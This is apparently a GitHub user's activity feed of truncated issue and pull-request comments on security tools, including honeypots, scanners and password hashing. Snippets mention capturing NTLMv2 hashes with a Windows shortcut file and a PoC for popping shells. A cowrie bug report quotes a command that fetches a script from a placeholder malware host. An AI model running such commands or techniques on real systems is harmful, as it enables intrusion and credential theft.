Dylan Katz
Dylan Katz
Can't CloudFlare fix this? I'm assuming it's been reported to them, right? It seems like a major security flaw as it allows people to bypass their entire system if they...
Added support for configuring dots/dashes changing score. Ideally all factors impacting score should be configurable (untrusted CAs, ignored keywords like email, etc) or at least visible, but this met my...
This change drastically increases the success rate for getting NTLMv2 hashes. The gist of it is, the img file I added contains a single windows shortcut (.lnk) file with an...
Hi, I've noticed that a lot of tutorials/example configs for cowrie don't realize/acknowledge the risks of internal metadata APIs for something like AWS or Google Cloud. Would it be worthwhile...
#### Issue details First, is this project being actively maintained? There's several open prs and issues that seemingly haven't been addressed and the last commit was in July of last...
I made a PoC for your PoC so I can pop shells while you pop shells: ``` echo '''HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: localhost Cookie: ASP.NET_SessionId=test-sess-id Time id="__VIEWSTATEGENERATOR"...
The PR in question notified everyone in EpicGames/Developers, a group of almost 400,000 Unreal Engine users. Shortly after, someone tagged the Microsoft org (https://github.com/orgs/microsoft/people), which may have also notified those...
Complaining about someone using masscan to mass scan their network "Some idiot is using your tool to mass scan our network" ez link: https://github.com/robertdavidgraham/masscan/issues/482
Currently the default password used by this project is unsalted sha256. This is unsafe due to advances in modern computing power and rainbow table attacks. To give some context, I...
Similar to #152 , commands such as "yum -y install wget" get parsed as files for downloading. Vice versa, "cd /etc;wget -c http://malware.badpersonwebsite.bad/download.sh" will not download "download.sh".